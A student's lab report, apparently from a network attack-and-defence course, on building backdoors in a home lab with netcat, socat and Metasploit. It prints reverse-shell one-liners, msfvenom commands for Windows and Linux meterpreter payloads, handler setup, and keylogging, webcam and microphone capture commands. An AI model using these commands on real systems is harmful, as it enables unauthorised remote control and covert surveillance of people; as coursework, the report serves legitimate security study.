20192430 2021-2022-2 《网络与系统攻防技术》实验二实验报告

一、实验内容

(1)使用netcat获取主机操作Shell,cron启动某项任务
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

二、实验过程

任务一

使用netcat获取主机操作Shell,cron启动某项任务

首先获取主机ip地址以及虚拟机ip地址

测试主机与虚拟机之间的连通性(ping)

ncat.exe -l -p 8888 // win主机运行监听指令
nc 192.168.1.172 8888 -e /bin/sh // linux反弹连接win主机指令

nc -l -p 8888 // linux主机运行监听指令
ncat.exe -e cmd.exe 192.168.241.128 8888 // win主机反弹连接linux指令

工具测试完毕开始实验目标:使用cron获得反弹,添加反弹命令

使用ncat.exe监听反弹信息

任务二

使用socat获取主机操作Shell, 任务计划启动

在任务计划程序中创建任务,具体设置如图

达到时间后会弹出窗口

不关闭窗口,在虚拟机里使用socat命令获取主机shell

socat - tcp:192.168.1.172:1899

任务三

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

创建后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.172 LPORT=1899 -f exe > 20192430xzc_backdoor.exe

创建结果如下

将后门程序通过ncat输入输出重定向传输到主机上

nc 192.168.1.172 1899 < 2019230xzc_backdoor.exe
ncat -l -p 1899 -vv -w 3 > 20192430xzc_backdoor.exe

在虚拟机中使用msfconsole指令打开msf控制台

进入监听模块,设置攻击载荷,地址号和端口号

use exploit/multi/handler // 进入监听模块
set payload windows/meterpreter/reverse_tcp // 设置攻击载荷
set LHOST 192.168.241.128 // 设置IP地址,与后门的LHOST保持一致
set LPORT 1899 // 设置端口号,与后门的LPORT保持一致

使用exploit开启监听,出现

# [*] Started reverse TCP handler on 192.168.241.128:1899

此时在主机运行后门程序,则可以获得主机shell

任务四

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic//获取音频

这里由于虚拟机问题并未成功实现,详见问题与解决

webcam_snap//获取摄像头权限拍照

keyscan_start//记录敲击键盘的过程
keyscan_dump//读取敲击键盘的记录

screenshot//获取主机截屏

获取提权结果

任务五

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

生成shellcode并注入

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.241.128 LPORT=1899 -x ./pwn20192430 -f elf > pwn20192430_00

进入msf控制台,由于是针对linux的32位程序,故攻击载荷变为

use exploit/multi/handler // 进入监听模块
set payload linux/x86/meterpreter/reverse_tcp // 设置攻击载荷
set LHOST 192.168.241.128 // 设置IP地址,与后门的LHOST保持一致
set LPORT 1899 // 设置端口号,与后门的LPORT保持一致

在另一个终端中运行程序,即可获得Linux的shell权限

三、问题及解决方案

  • 问题1:传输后门程序时显示目标计算机积极拒绝
  • 问题1解决方案:多次重复之后成功,并未找到实际原因

  • 问题2:尝试提权时无法获取音频

  • 问题2解决方案:在网上搜索之后并未解决,虚拟机显示无法开启声音设备

  • 问题3:任务五监听时sesion不断循环增加,并未找到原因

四、回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

部分网络资源安装包捆绑下载

(2)例举你知道的后门如何启动起来(win及linux)的方式?

网络协议的捆绑自启动或者软件中设置后门自启动

(3)Meterpreter有哪些给你映像深刻的功能?

非常便捷的生成后门程序,获取主机的一系列权限

(4)如何发现自己有系统有没有被安装后门?

检查是否有不常用的ip连接或者端口持续开放

五、学习感悟、思考等

本次实验学习了反弹链接与后门程序获取权限,在实验中遇到很多问题,但是在同学和老师的帮助下解决了大部分,对于后门程序也有了实践方面的了解,希望今后还能继续完善这方面的知识,理论与实践相互促进.
虽然现在的我仅仅只是了解后门的基本原理,掌握了最基本的后门的生成、投送、启动,但有了现在的基础,一步步循序渐进,我会学到更深入的知识,也认识到系统防范入侵的能力很低,在以后工作学习中应注意安全防护。
最后感谢老师和同学对于实验问题的解答与帮助。

posted @ 2022-04-03 15:07  屿微  阅读(34)  评论(0编辑  收藏  举报